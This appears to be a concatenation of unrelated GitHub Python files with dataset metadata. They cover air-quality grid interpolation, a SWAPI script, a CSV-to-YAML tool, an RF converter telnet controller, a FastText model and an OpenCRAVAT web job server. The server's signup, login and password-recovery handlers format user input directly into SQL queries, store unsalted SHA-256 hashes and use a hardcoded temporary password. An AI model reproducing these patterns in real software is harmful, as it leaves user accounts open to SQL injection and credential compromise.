aq_v_interpolated = mlab.griddata(station_data_aqv['lat'].values, station_data_aqv['lon'].values,
station_data_aqv['value'].values, lat_locs, lon_locs, interp='linear')
# Out of area locations
out_of_area_locs = pd.melt(pd.DataFrame(aq_v_interpolated.mask))
out_of_area_locs = locs_data['gr_id'][out_of_area_locs['value']].values
aq_v_data = aq_v_interpolated.data
# For grid points that are out of range of triangulation, use closest station
for ooa_loc in out_of_area_locs:
near_station_dat = nearest_station_df[nearest_station_df['gr_id'] == ooa_loc]
xx = lon_locs.searchsorted(near_station_dat['c_lon'])
yy = lat_locs.searchsorted(near_station_dat['c_lat'])
aq_v_data[xx, yy] = near_station_dat['value']
new_col = pd.melt(pd.DataFrame(aq_v_data))
locs_data[aq_v] = new_col['value']
return locs_data
def predict_stations_data(stations_dat, forecast_periods):
"""
Predict the stations data into the future
"""
last_time = stations_dat['Date Time'].max()
stations_grouped = stations_dat.groupby(['station', 'lat', 'lon'])
all_forecasts = pd.DataFrame()
for fp in range(1, forecast_periods + 1):
station_preds = stations_grouped.apply(predict_station).reset_index(drop=True)
station_preds['Date Time'] = last_time + dt.timedelta(hours=fp)
all_forecasts = all_forecasts.append(station_preds)
return all_forecasts
def predict_station(var_series):
"""
Predict the next in the time series
"""
last_value = var_series[-1:]
return last_value
def get_breakpoints(data_dir = '/app/static'):
breaks_file = os.path.join(data_dir, 'breakpoints.csv')
breakpoints = pd.read_csv(breaks_file)
return breakpoints
@timeout(90)
def main():
"""
Main function: times out after 90 seconds
"""
print('Begin main')
aq_variables = ['PM25', 'O3', 'AQI']
hist_periods = 5
forecast_periods = 7
all_stations = get_stations()
breakpoints = get_breakpoints()
#Dates for current period
end_date = dt.date.today()
start_date = end_date - dt.timedelta(1)
print('Get station data')
station_data_raw = get_station_raw_data(all_stations, start_date, end_date)
print('Finished getting station data')
stations_ffilled = station_data_raw.groupby('station').fillna(method='ffill')
stations_ffilled['station'] = station_data_raw['station']
stations_predictions = predict_stations_data(stations_ffilled, forecast_periods)
all_station_data = stations_ffilled.append(stations_predictions)
time_stamps = all_station_data['Date Time'].unique()[
-(hist_periods+forecast_periods):]
all_grid_data = pd.DataFrame()
print('Calculating AQI and Interpolating over grid')
for ts in time_stamps:
station_time = all_station_data[all_station_data['Date Time'] <= ts]
# Current station data
stations_output = calculate_stations_aqi_data(station_time, breakpoints, aq_variables)
# Interpolate the grid data
current_grid_data = get_interpolated_grid_data(stations_output, aq_variables)
current_grid_data['time'] = ts
all_grid_data = all_grid_data.append(current_grid_data)
print('Finished main')
return all_grid_data
| patrick-miller/forecastaer | main.py | main.py | py | 11,649 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "numpy.nan",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line... |
30874114710 | import requests
ship = "10/"
resp = requests.get("https://swapi.co/api/starships/"+ship)
print(resp.status_code)
data = resp.json()
print(str(data['name']))
print("Peliculas:")
for var in data['films']:
url = str(var)
pelis = requests.get(url)
pelis = pelis.json()
print(str(pelis['title'])) | Pxncxke/millenium | api.py | api.py | py | 323 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
}
] |
32200653326 | #! /usr/bin/env python
import sys
import argparse
import csv
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input', metavar='INPUT', type=argparse.FileType('rb'), help="csv file")
parser.add_argument('output', metavar='OUTPUT', type=argparse.FileType('wb'), help="yml file")
args = parser.parse_args()
csvreader = csv.reader(args.input)
column_names = next(csvreader)
i = 0
f = args.output
for row in csvreader:
f.write(str(i) + ":\n")
i += 1
j = 0
for attr in row:
if len(attr) == 0:
print("WARNING! Entry #" + str(i) + "'s \"" + column_names[j] + "\" is null")
f.write(" " + column_names[j] + ": " + attr + "\n")
j += 1
if __name__ == '__main__':
sys.exit(main())
| pk-hack/CoilSnake | coilsnake/tools/csv2yml.py | csv2yml.py | py | 818 | python | en | code | 153 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "csv.reader... |
30807069231 | #!/usr/bin/env python
#
# A class to control mu-del converters
#
# Incomplete
# 7DEC11 - Kyle Eberhart
import telnetlib
import logging
from multiprocessing import Process
from multiprocessing import Queue as Q
import queue
import time
class ConvProcess(object):
'''
A converter controller that runs in a seperate process, for smoother
GUI operation. in_queue is how you send commands, out_queue is where
data comes back.
'''
def __init__(self, **kwargs):
'''
Initialize our queues and other startup tasks.
'''
self.in_queue = Q()
self.out_queue = Q()
self.process = None
self.address = kwargs.get('address', None)
self.port = kwargs.get('port', None)
self.converter_target = None
def connect(self):
'''
start the converter communication process, feed it some queues.
'''
self.process = Process(target=self._connect,
args=(self.in_queue,
self.out_queue))
self.process.daemon = 1
self.process.start()
def command(self, message):
'''
send a command to the converter, using the in_q.
'''
self.in_queue.put(message)
def disconnect(self):
'''
disconnect from the converter and terminate the process.
'''
self.in_queue.put('disconnect')
def kill_process(self):
'''
kill the child process.
'''
self.in_queue.put('kill')
self.process.join()
self.process = None
self.converter_target = None
def _connect(self, in_q, out_q):
'''
The converter connection and processing loop.
'''
self.converter_target = Converter(address=self.address,
port=self.port)
self.converter_target.connect()
while True:
try:
conv_command = in_q.get_nowait()
if conv_command == 'disconnect':
self.converter_target.disconnect()
out_q.put("Requesting converter process termination.")
elif conv_command == 'kill':
break
elif 'freq' in conv_command:
self.converter_target.setFreq(conv_command[1])
elif 'atten' in conv_command:
self.converter_target.setAtten(conv_command[1])
elif 'mute' in conv_command:
if conv_command[1]:
self.converter_target.setMute()
else:
self.converter_target.unsetMute()
except Queue.Empty:
try:
if self.converter_target is not None:
self.converter_target.getStatus()
out_q.put({'freq' : self.converter_target.frequency,
'atten' : self.converter_target.attenuation,
'status' : self.converter_target.statusCode,
'mute' : self.converter_target.mute})
except EOFError:
out_q.put("Status attempt failed!")
self.converter_target.disconnect()
out_q.put("Requesting converter process termination.")
time.sleep(1)
def __del__(self):
'''
clean up correctly if possible.
'''
if self.process:
self.disconnect()
self.kill_process()
class Converter(object):
def __init__(self, address='192.168.1.3', port=4004):
self.logger = logging.getLogger(__name__)
self.address = address
self.port = port
self.target = None
self.errorMsg = None
def __repr__(self):
return "<MuDelConverter('%s', '%s')" % (self.address, self.port)
def connect(self):
'''
connect to the converter, and determine the converter type
'''
self.target = telnetlib.Telnet(self.address, self.port)
self.target.write('<?\r'.encode('ascii'))
self.status = self.target.read_until(b'randomString', 2).decode('ascii')
if 'MDC-1627F1K-7' in self.status:
self.type = 'MDC-1627F1K-7'
elif 'MDC-2125F1K-72' in self.status:
self.type = 'MDC-2125F1K-72'
elif 'MUC-7-1627-F1K' in self.status:
self.type = 'MUC-7-1627-F1K'
else:
self.errorMsg = "Converter model unknown: %s" % self.status
self.logger.debug(self.errorMsg)
raise RuntimeError(self.errorMsg)
def disConnect(self):
'''
disconnect from the converter
'''
self.target.close()
self.target = None
def getStatus(self):
if self.target is None:
self.connect()
self.target.write('<S\r'.encode('ascii'))
self.status = self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
myStatus = self.status[1:].split(',')
self.frequency = (float(myStatus[0]) + 1600000) / 1000
self.attenuation = (float(myStatus[1]) / 5)
if int(myStatus[2]) is 1:
self.statusCode = "Normal Operation"
elif int(myStatus[2]) is 2:
self.statusCode = "Synth Lock Lost"
elif int(myStatus[2]) is 3:
self.statusCode = "Synth 2 Lock Lost"
elif int(myStatus[2]) is 4:
self.statusCode = "Synth 3 Lock Lost"
elif int(myStatus[2]) is 5:
self.statusCode = "Local Osc Lock Lost"
elif int(myStatus[2]) is 6:
self.statusCode = "Aux Input 2 Alarm"
elif int(myStatus[2]) is 7:
self.statusCode = "Aux Input 3 Alarm"
elif int(myStatus[2]) is 8:
self.statusCode = "Aux Input 4 Alarm"
elif int(myStatus[2]) is 9:
self.statusCode = "Reference Osc Lost"
else:
self.statusCode = "Unknown"
self.mute = bool(int(myStatus[3][0:1]))
if self.type == 'MDC-2125F1K-72':
myStatus = self.status[1:].split(',')
self.frequency = (float(myStatus[0]) + 2100000) / 1000
self.attenuation = (float(myStatus[1]) / 5)
if int(myStatus[2]) is 1:
self.statusCode = "Normal Operation"
elif int(myStatus[2]) is 2:
self.statusCode = "Synth Lock Lost"
elif int(myStatus[2]) is 3:
self.statusCode = "Synth 2 Lock Lost"
elif int(myStatus[2]) is 4:
self.statusCode = "Synth 3 Lock Lost"
elif int(myStatus[2]) is 5:
self.statusCode = "Local Osc Lock Lost"
elif int(myStatus[2]) is 6:
self.statusCode = "Aux Input 2 Alarm"
elif int(myStatus[2]) is 7:
self.statusCode = "Aux Input 3 Alarm"
elif int(myStatus[2]) is 8:
self.statusCode = "Aux Input 4 Alarm"
elif int(myStatus[2]) is 9:
self.statusCode = "Reference Osc Lost"
else:
self.statusCode = "Unknown"
self.mute = None
return {'Freq': self.frequency, 'Atten': self.attenuation, 'Code': self.statusCode, 'Mute': self.mute}
def setFreq(self, freq):
'''
set the converter frequency
'''
if self.target is None:
self.connect()
if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
stepValue = (int((float(freq) * 1000)) - 1600000)
if stepValue < 0:
stepValue = 0
if stepValue > 1100000:
stepValue = 1100000
self.target.write('<X1{}\r'.format(stepValue).encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
elif self.type == 'MDC-2125F1K-72':
stepValue = (int((float(freq) * 1000)) - 2100000)
if stepValue < 0:
stepValue = 0
if stepValue > 400000:
stepValue = 400000
self.target.write('<{}\r'.format(stepValue).encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
else:
self.errorMsg = "Unknown converter type, no freq change"
self.logger.debug(self.errorMsg)
raise RuntimeError(self.errorMsg)
def setAtten(self, atten):
if self.target is None:
self.connect()
if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
stepValue = int(float(atten) * 5)
if stepValue < 0:
stepValue = 0
if stepValue > 150:
stepValue = 150
self.target.write('<A1{}\r'.format(stepValue).encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
elif self.type == 'MDC-2125F1K-72':
stepValue = int(float(atten) * 5)
if stepValue < 0:
stepValue = 0
if stepValue > 150:
stepValue = 150
self.target.write('<A{}\r'.format(stepValue).encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
else:
self.errorMsg = "Unknown converter type, no atten change"
raise RuntimeError(self.errorMsg)
def setMute(self):
if self.target is None:
self.connect()
if self.type == 'MDC-2125F1K-72':
self.errorMsg = "This D/C doesn't support muting"
raise RuntimeError(self.errorMsg)
self.target.write('<M1\r'.encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
def unsetMute(self):
if self.target is None:
self.connect()
if self.type == 'MDC-2125F1K-72':
self.errorMsg = "This D/C doesn't support muting"
raise RuntimeError(self.errorMsg)
self.target.write('<M0\r'.encode('ascii'))
self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
def setConfig(self, **kwargs):
'''
configure the whole converter in one bang
'''
if 'Freq' in kwargs:
self.setFreq(kwargs['Freq'])
if 'Atten' in kwargs:
self.setAtten(kwargs['Atten'])
if 'Mute' in kwargs:
if kwargs['Mute'] is True:
self.setMute()
if kwargs['Mute'] is False:
self.unsetMute()
def close(self):
if self.target is not None:
self.disConnect()
if __name__ == "__main__":
# run a test, or just set things up...
import argparse
import sys
logging.basicConfig(filename='Mudelconverter.log',
filemode='w',
level=logging.INFO)
parser = argparse.ArgumentParser(description='Configure a MuDel Converter',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--freq', help='Set the frequency in MHz.')
parser.add_argument('-a', '--atten', help='Set the attenuation in dB.')
parser.add_argument('-m', '--mute', help='Toggle the mute.')
parser.add_argument('dest', help='IP address of the target device.')
args = parser.parse_args()
config = vars(args)
if config['dest'] is not None:
try:
ip, port = config['dest'].split(':')
except ValueError as err:
print('\nIt doesn\'t seem like a port was specified.')
print('\txxx.xxx.xxx.xxx:ppp')
print('Where xxx is the IP octet and ppp is the port number.\n')
sys.exit()
try:
converter = Converter(ip, port)
converter.connect()
print('\n')
# print(converter.status)
except RuntimeError as err:
print('\nConnection to converter failed!!!')
print(err)
print('\n')
sys.exit()
try:
converter.getStatus()
print('---- Current Status ----')
print('Freq: {} MHz'.format(converter.frequency))
print('Atten: {} dB'.format(converter.attenuation))
print('LO: {}'.format(converter.statusCode))
print('Mute: {}'.format(converter.mute))
print('\n')
except RuntimeError as err:
print('\nStatus fetch failed!!!')
print(err)
print('\n')
sys.exit()
if config['freq'] is not None:
# set the frequency, check the input formatting first.
converter.setFreq(config['freq'])
if config['atten'] is not None:
# set the attenuation, check the input formatting first.
converter.setAtten(config['atten'])
if config['mute'] is not None:
# always unmute the converter.
converter.unsetMute()
converter.getStatus()
print('---- Final Status ----')
print('Freq: {} MHz'.format(converter.frequency))
print('Atten: {} dB'.format(converter.attenuation))
print('LO: {}'.format(converter.statusCode))
print('Mute: {}'.format(converter.mute))
print('\n')
converter.close()
sys.exit()
| keberhart/mu_del_converters | MuDelconverter.py | MuDelconverter.py | py | 13,500 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "multiprocessing.Queue",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Queue",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "t... |
20491607874 | import torch
from torch import nn
import torch.nn.functional as F
class FastText(nn.Module):
def __init__(self, num_tags, vocab_size, embed_size, input_dropout_rate,
embed_type='rand', use_bigram=False, bigram_vocab_size=0, bigram_embed_size=0):
super(FastText, self).__init__()
self.embed_type = embed_type
self.use_bigram = use_bigram
hidden_size = embed_size
self.embedding = nn.Embedding(vocab_size, embed_size)
if use_bigram:
hidden_size += bigram_embed_size * 2
self.bigram_embedding = nn.Embedding(bigram_vocab_size, bigram_embed_size)
if embed_type == 'static':
for param in self.embedding.parameters():
param.requires_grad = False
if use_bigram:
for param in self.bigram_embedding.parameters():
param.requires_grad = False
self.linear = nn.Linear(hidden_size, num_tags)
self.in_dropout = nn.Dropout(input_dropout_rate)
self.ce_loss = nn.CrossEntropyLoss()
def init_embedding(self, pretrained_embeddings):
self.embedding.weight.data.copy_(torch.from_numpy(pretrained_embeddings))
def init_bigram_embedding(self, pretrained_embeddings):
self.bigram_embedding.weight.data.copy_(torch.from_numpy(pretrained_embeddings))
def forward(self, tokens, masks, bigram, decode=True, tags=None):
masks = masks.unsqueeze(2)
embed = self.embedding(tokens)
if self.use_bigram:
embed_bi = torch.cat([self.bigram_embedding(bigram[:, :, i]) for i in range(bigram.size()[2])], dim=2)
embed = torch.cat((embed, embed_bi), dim=2)
embed = self.in_dropout(embed)
context = torch.mul(embed, masks)
context = context.mean(1)
out = self.linear(context)
if decode:
out = F.softmax(out, dim=1)
out = torch.argmax(out, dim=1)
pred = out.cpu().numpy()
return pred
else:
loss = self.ce_loss(out, tags)
return loss
| zerozzl/nlp_text_cla | fasttext/model.py | model.py | py | 2,103 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.nn.Embedding",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
16199796086 | import os
import time
import datetime
import subprocess
import yaml
import json
from cravat import admin_util as au
from cravat import ConfigLoader
import sys
import traceback
import shutil
from aiohttp import web
#from cryptography import fernet
#from aiohttp_session import get_session, new_session
import aiosqlite3
import hashlib
from distutils.version import LooseVersion
import glob
import platform
class FileRouter(object):
def __init__(self):
self.root = os.path.dirname(__file__)
self.input_fname = 'input'
self.report_extensions = {
'text':'.tsv',
'excel':'.xlsx'
}
self.db_extension = '.sqlite'
self.log_extension = '.log'
async def get_jobs_dir (self, request):
root_jobs_dir = au.get_jobs_dir()
'''
session = await get_session(request)
if servermode:
if 'logged' in session:
if session['logged'] != True:
session['username'] = ''
session['logged'] = False
return None
else:
username = session['username']
else:
session['logged'] = False
session['username'] = ''
return None
else:
username = 'default'
session['username'] = username
'''
username = 'default'
jobs_dir = os.path.join(root_jobs_dir, username)
return jobs_dir
async def job_dir(self, request, job_id):
jobs_dir = await self.get_jobs_dir(request)
if jobs_dir == None:
return None
else:
return os.path.join(jobs_dir, job_id)
async def job_input(self, request, job_id):
job_dir, statusjson = await filerouter.job_status(request, job_id)
orig_input_fname = None
if 'orig_input_fname' in statusjson:
orig_input_fname = statusjson['orig_input_fname']
else:
fns = os.listdir(job_dir)
for fn in fns:
if fn.endswith('.crv'):
orig_input_fname = fn[:-4]
break
if orig_input_fname is not None:
orig_input_path = os.path.join(job_dir, orig_input_fname)
else:
orig_input_path = None
return orig_input_path
async def job_db(self, request, job_id):
orig_input_path = await self.job_input(request, job_id)
output_fname = orig_input_path + self.db_extension
return output_fname
async def job_report(self, request, job_id, report_type):
ext = self.report_extensions.get(report_type, '.'+report_type)
orig_input_path = await self.job_input(request, job_id)
report_path = orig_input_path + ext
return report_path
async def job_status (self, request, job_id):
job_dir = await self.job_dir(request, job_id)
fns = os.listdir(job_dir)
statusjson = {}
for fn in fns:
if fn.endswith('.status.json'):
with open(os.path.join(job_dir, fn)) as f:
statusjson = json.loads(f.readline())
elif fn.endswith('.info.yaml'):
with open(os.path.join(job_dir, fn)) as f:
statusjson = yaml.load(f)
return job_dir, statusjson
'''
def get_orig_input_path (self, request, job_id):
job_dir = await self.job_dir(request, job_id)
fns = os.listdir(job_dir)
orig_input_fname = None
for fn in fns:
if fn.endswith('.status.json'):
with open(os.path.join(job_dir, fn)) as f:
statusjson = json.loads(f.readline())
if 'orig_input_fname' in statusjson:
orig_input_fname = statusjson['orig_input_fname']
elif fn.endswith('.info.yaml'):
with open(os.path.join(job_dir, fn)) as f:
infojson = yaml.load(f)
if 'orig_input_fname' in infojson:
orig_input_fname = infojson['orig_input_fname']
if orig_input_fname is not None:
orig_input_path = os.path.join(job_dir, orig_input_fname + '.log')
if os.path.exists(orig_input_path) == False:
orig_input_path = None
else:
orig_input_path = None
return orig_input_path
'''
async def job_log (self, request, job_id):
orig_input_path = await self.job_input(request, job_id)
if orig_input_path is not None:
log_path = orig_input_path + '.log'
if os.path.exists(log_path) == False:
log_path = None
else:
log_path = None
if log_path != None:
return log_path
else:
return None
class WebJob(object):
def __init__(self, job_dir, job_status_fpath):
self.info = {}
self.job_dir = job_dir
self.job_status_fpath = job_status_fpath
self.info['id'] = os.path.basename(job_dir)
def save_job_options (self, job_options):
self.set_values(**job_options)
def read_info_file(self):
with open(self.job_status_fpath) as f:
info_dict = yaml.load(f)
if info_dict != None:
self.set_values(**info_dict)
def set_info_values(self, **kwargs):
self.set_values(**kwargs)
def get_info_dict(self):
return self.info
def set_values(self, **kwargs):
self.info.update(kwargs)
def get_next_job_id():
return datetime.datetime.now().strftime(r'%y%m%d-%H%M%S')
async def submit (request):
global filerouter
job_id = get_next_job_id()
jobs_dir = await filerouter.get_jobs_dir(request)
job_dir = os.path.join(jobs_dir, job_id)
os.makedirs(job_dir, exist_ok=True)
reader = await request.multipart()
input_file = None
job_options = None
input_files = []
while True:
part = await reader.next()
if not part:
break
if part.name.startswith('file_'):
input_files.append(part)
# Have to write to disk here
wfname = part.filename
wpath = os.path.join(job_dir, wfname)
with open(wpath,'wb') as wf:
wf.write(await part.read())
elif part.name == 'options':
job_options = await part.json()
input_fnames = [fp.filename for fp in input_files]
if len(input_fnames) == 1:
orig_input_fname = input_fnames[0]
elif len(input_fnames) > 1:
orig_input_fname = ', '.join([os.path.basename(x) for x in input_fnames])
info_fname = '{}.status.json'.format(orig_input_fname)
job_info_fpath = os.path.join(job_dir, info_fname)
job = WebJob(job_dir, job_info_fpath)
job.save_job_options(job_options)
job.set_info_values(
orig_input_fname=orig_input_fname,
orig_input_files=input_fnames,
submission_time=datetime.datetime.now().isoformat(),
viewable=False
)
# Subprocess arguments
input_fpaths = [os.path.join(job_dir, fn) for fn in input_fnames]
tot_lines = 0
for fpath in input_fpaths:
with open(fpath) as f:
tot_lines += count_lines(f)
expected_runtime = get_expected_runtime(tot_lines, job_options['annotators'])
job.set_info_values(expected_runtime=expected_runtime)
run_args = ['cravat']
for fn in input_fnames:
run_args.append(os.path.join(job_dir, fn))
# Annotators
if len(job_options['annotators']) > 0:
run_args.append('-a')
run_args.extend(job_options['annotators'])
else:
run_args.append('--sa')
run_args.append('-e')
run_args.append('*')
# Liftover assembly
run_args.append('-l')
run_args.append(job_options['assembly'])
# Reports
if len(job_options['reports']) > 0:
run_args.append('-t')
run_args.extend(job_options['reports'])
else:
run_args.append('--sr')
# Note
if 'note' in job_options:
run_args.append('--note')
run_args.append(job_options['note'])
# Forced input format
if 'forcedinputformat' in job_options:
run_args.append('--forcedinputformat')
run_args.append(job_options['forcedinputformat'])
p = subprocess.Popen(run_args)
status = {'status': 'Submitted'}
job.set_info_values(status=status)
# admin.sqlite
# if servermode:
# root_jobs_dir = au.get_jobs_dir()
# admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
# db = await aiosqlite3.connect(admin_db_path)
# cursor = await db.cursor()
# '''
# session = await get_session(request)
# username = session['username']
# '''
# username = 'default'
# await cursor.execute('insert into jobs values ("{}", "{}", "{}", {}, {}, "{}", "{}")'.format(job_id, username, job.get_info_dict()['submission_time'], -1, -1, '', job_options['assembly']))
# await db.commit()
# cursor.close()
# db.close()
return web.json_response(job.get_info_dict())
def count_lines(f):
n = 0
for _ in f:
n+=1
return n
def get_expected_runtime(num_lines, annotators):
mapper_vps = 1000
annot_vps = 5000
agg_vps = 8000
return num_lines*(1/mapper_vps + len(annotators)/annot_vps + 1/agg_vps)
def get_annotators(request):
out = {}
for local_info in au.get_local_module_infos(types=['annotator']):
module_name = local_info.name
if local_info.type == 'annotator':
out[module_name] = {
'name':module_name,
'version':local_info.version,
'type':local_info.type,
'title':local_info.title,
'description':local_info.description,
'developer': local_info.developer
}
return web.json_response(out)
def find_files_by_ending (d, ending):
fns = os.listdir(d)
files = []
for fn in fns:
if fn.endswith(ending):
files.append(fn)
return files
async def get_all_jobs (request):
global filerouter
jobs_dir = await filerouter.get_jobs_dir(request)
if jobs_dir == None:
return web.json_response([])
if os.path.exists(jobs_dir) == False:
os.mkdir(jobs_dir)
ids = os.listdir(jobs_dir)
ids.sort(reverse=True)
all_jobs = []
for job_id in ids:
try:
job_dir = os.path.join(jobs_dir, job_id)
if os.path.isdir(job_dir) == False:
continue
fns = find_files_by_ending(job_dir, '.status.json')
if len(fns) < 1:
continue
status_fname = fns[0]
status_fpath = os.path.join(job_dir, status_fname)
job = WebJob(job_dir, status_fpath)
job.read_info_file()
fns = find_files_by_ending(job_dir, '.info.yaml')
if len(fns) > 0:
info_fpath = os.path.join(job_dir, fns[0])
with open (info_fpath) as f:
info_json = yaml.load('\n'.join(f.readlines()))
for k, v in info_json.items():
if k == 'status' and 'status' in job.info:
continue
job.info[k] = v
fns = find_files_by_ending(job_dir, '.sqlite')
if len(fns) > 0:
db_path = os.path.join(job_dir, fns[0])
else:
db_path = ''
job_viewable = os.path.exists(db_path)
job.set_info_values(
viewable=job_viewable,
db_path=db_path,
status=job.info['status'],
)
existing_reports = []
for report_type in get_valid_report_types():
ext = filerouter.report_extensions.get(report_type, '.'+report_type)
job_input = await filerouter.job_input(request, job_id)
if job_input is None:
continue
report_fname = job_input + ext
report_file = os.path.join(job_dir, report_fname)
if os.path.exists(report_file):
existing_reports.append(report_type)
job.set_info_values(reports=existing_reports)
all_jobs.append(job)
except:
traceback.print_exc()
continue
return web.json_response([job.get_info_dict() for job in all_jobs])
async def view_job(request):
global VIEW_PROCESS
global filerouter
job_id = request.match_info['job_id']
db_path = await filerouter.job_db(request, job_id)
if os.path.exists(db_path):
if type(VIEW_PROCESS) == subprocess.Popen:
VIEW_PROCESS.kill()
VIEW_PROCESS = subprocess.Popen(['cravat-view', db_path])
return web.Response()
else:
return web.Response(status=404)
async def delete_job(request):
global filerouter
job_id = request.match_info['job_id']
job_dir = await filerouter.job_dir(request, job_id)
if os.path.exists(job_dir):
shutil.rmtree(job_dir)
return web.Response()
else:
return web.Response(status=404)
async def download_db(request):
global filerouter
job_id = request.match_info['job_id']
db_path = await filerouter.job_db(request, job_id)
db_fname = job_id+'.sqlite'
headers = {'Content-Disposition': 'attachment; filename='+db_fname}
return web.FileResponse(db_path, headers=headers)
async def get_job_log (request):
global filerouter
job_id = request.match_info['job_id']
log_path = await filerouter.job_log(request, job_id)
if log_path is not None:
with open(log_path) as f:
return web.Response(text=f.read())
else:
return web.Response(text='loo file does not exist.')
def get_valid_report_types():
reporter_infos = au.get_local_module_infos(types=['reporter'])
report_types = [x.name.split('reporter')[0] for x in reporter_infos]
return report_types
def get_report_types(request):
cfl = ConfigLoader()
default_reporter = cfl.get_cravat_conf_value('reporter')
default_type = default_reporter.split('reporter')[0]
valid_types = get_valid_report_types()
return web.json_response({'valid': valid_types, 'default': default_type})
async def generate_report(request):
global filerouter
job_id = request.match_info['job_id']
report_type = request.match_info['report_type']
if report_type in get_valid_report_types():
job_input = await filerouter.job_input(request, job_id)
cmd_args = ['cravat', job_input]
cmd_args.append('--str')
cmd_args.extend(['-t', report_type])
p = subprocess.Popen(cmd_args)
p.wait()
return web.Response()
async def download_report(request):
global filerouter
job_id = request.match_info['job_id']
report_type = request.match_info['report_type']
report_path = await filerouter.job_report(request, job_id, report_type)
report_name = job_id+'.'+report_path.split('.')[-1]
headers = {'Content-Disposition':'attachment; filename='+report_name}
return web.FileResponse(report_path, headers=headers)
def get_jobs_dir (request):
jobs_dir = au.get_jobs_dir()
return web.json_response(jobs_dir)
def set_jobs_dir (request):
queries = request.rel_url.query
d = queries['jobsdir']
au.set_jobs_dir(d)
return web.json_response(d)
async def get_system_conf_info (request):
info = au.get_system_conf_info_json()
global filerouter
return web.json_response(info)
async def update_system_conf (request):
queries = request.rel_url.query
sysconf = json.loads(queries['sysconf'])
try:
success = au.update_system_conf_file(sysconf)
except:
raise
sysconf = {}
success = False
return web.json_response({'success': success, 'sysconf': sysconf})
def reset_system_conf (request):
d = au.read_system_conf_template()
md = au.get_modules_dir()
jobs_dir = au.get_jobs_dir()
d['modules_dir'] = md
d['jobs_dir'] = jobs_dir
au.write_system_conf_file(d)
return web.json_response({'status':'success', 'dict':yaml.dump(d)})
async def create_user_dir (request, username):
global filerouter
jobs_dir = await filerouter.get_jobs_dir(request)
if os.path.exists(jobs_dir) == False:
os.mkdir(jobs_dir)
async def signup (request):
#session = await new_session(request)
queries = request.rel_url.query
username = queries['username']
password = queries['password']
m = hashlib.sha256()
m.update(password.encode('utf-16be'))
passwordhash = m.hexdigest()
question = queries['question']
answer = queries['answer']
m = hashlib.sha256()
m.update(answer.encode('utf-16be'))
answerhash = m.hexdigest()
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
await cursor.execute('select * from users where email="{}"'.format(username))
r = await cursor.fetchone()
if r is not None:
return web.json_response('already registered')
await cursor.execute('insert into users values ("{}", "{}", "{}", "{}")'.format(username, passwordhash, question, answerhash))
await db.commit()
await cursor.close()
await db.close()
'''
session['username'] = username
session['logged'] = True
'''
await create_user_dir(request, username)
return web.json_response('success')
async def login (request):
#session = await new_session(request)
queries = request.rel_url.query
username = queries['username']
password = queries['password']
m = hashlib.sha256()
m.update(password.encode('utf-16be'))
passwordhash = m.hexdigest()
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
await cursor.execute('select * from users where email="{}" and passwordhash="{}"'.format(username, passwordhash))
r = await cursor.fetchone()
if r is not None:
response = 'success'
'''
session['username'] = username
session['logged'] = True
'''
await create_user_dir(request, username)
else:
response = 'fail'
await cursor.close()
await db.close()
return web.json_response(response)
async def get_password_question (request):
#session = await get_session(request)
queries = request.rel_url.query
email = queries['email']
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
await cursor.execute('select question from users where email="{}"'.format(email))
r = await cursor.fetchone()
if r is None:
return web.json_response({'status':'fail', 'msg':'No such email'})
answer = r[0]
await cursor.close()
await db.close()
return web.json_response({'status':'success', 'msg':answer})
async def check_password_answer (request):
#session = await get_session(request)
queries = request.rel_url.query
email = queries['email']
answer = queries['answer']
m = hashlib.sha256()
m.update(answer.encode('utf-16be'))
answerhash = m.hexdigest()
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
await cursor.execute('select * from users where email="{}" and answerhash="{}"'.format(email, answerhash))
r = await cursor.fetchone()
if r is not None:
temppassword = 'open_cravat_temp_password'
m = hashlib.sha256()
m.update(temppassword.encode('utf-16be'))
temppasswordhash = m.hexdigest()
